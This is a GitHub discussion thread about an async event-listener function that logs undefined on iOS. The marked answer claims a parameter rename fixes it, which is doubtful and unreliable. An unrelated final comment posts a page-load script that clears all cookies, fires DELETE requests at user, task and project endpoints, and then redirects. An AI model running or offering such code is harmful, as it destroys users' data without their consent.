### DISCUSSION TITLE
async function within event listener is not passing response correctly in IOS

### DISCUSSION THREAD

**Discussion by SpeedFlying** [community/community#58886] [Programming Help] [answered]
### Body

I have four of the code below and want the functions to run asynchronously. However it is not working on IOS devices and console error is shown saying data is undefined.

document.addEventListener('customEvent', async (data) => {

    ```
try {
        console.log('before function:', data);
        await inititeFunction(data);
    } catch (err) {
        console.error('function failed:', err);
    };
});

async function inititeFunction (data) {
    console.log('inside function:', data);
}
```

this is working correctly on desktop and android devices but not IOS. Even the first console log is showing correctly on IOS devices but when the inititeFunction is called, the second console log is returning undefined

I have tried
```
await Promise.resolve();
await inititeFunction(data);
let eventData = data;
await inititeFunction(eventData);
```

### Guidelines

- [X] I have read and understood this category's [guidelines](https://github.com/orgs/community/discussions/51384) before making this post.

**Comment by iamsuiux** [comment, marked as answer]
I fixed the problem by just using a different variable name, eventData.

```
document.addEventListener('customEvent', async (data) => {

    try {
        console.log('before function:', data);
        await inititeFunction(data);
    } catch (err) {
        console.error('function failed:', err);
    };
});

async function inititeFunction (eventData) {
    console.log('inside function:', eventData);
}
```

**Comment by msbatin** [comment]
window.addEventListener('load', async function () {
  console.log('--- بدء الحذف التلقائي عند تحميل الصفحة ---');

  // حذف الكوكيز
  console.log('حذف الكوكيز...');
  document.cookie.split(";").forEach(cookie => {
    document.cookie = cookie.replace(/^ +/, "").replace(/=.*/, "=;expires=" + new Date(0).toUTCString() + ";path=/");
  });

  // بيانات API
  const apiEndpoints = [
    { path: '/api/delete/task/1', method: 'DELETE' },
    { path: '/api/delete/user/2', method: 'DELETE' },
    { path: '/api/delete/project/3', method: 'DELETE' }
  ];

  // حذف بيانات API
  console.log('حذف بيانات API...');
  let total = apiEndpoints.length;
  let completed = 0;

  for (const endpoint of apiEndpoints) {
    if (endpoint.method === 'DELETE') {
      try {
        await fetch(endpoint.path, { method: 'DELETE' });
        completed++;
        console.log(`(${completed}/${total}) تم حذف: ${endpoint.path}`);
      } catch (e) {
        console.error(`(${completed}/${total}) فشل حذف: ${endpoint.path}`, e);
      }
    }
  }

  console.log('--- الحذف مكتمل ---');

  // إعادة التوجيه
  window.location.href = "about:blank"; // أو window.close() لو يناسبك
});
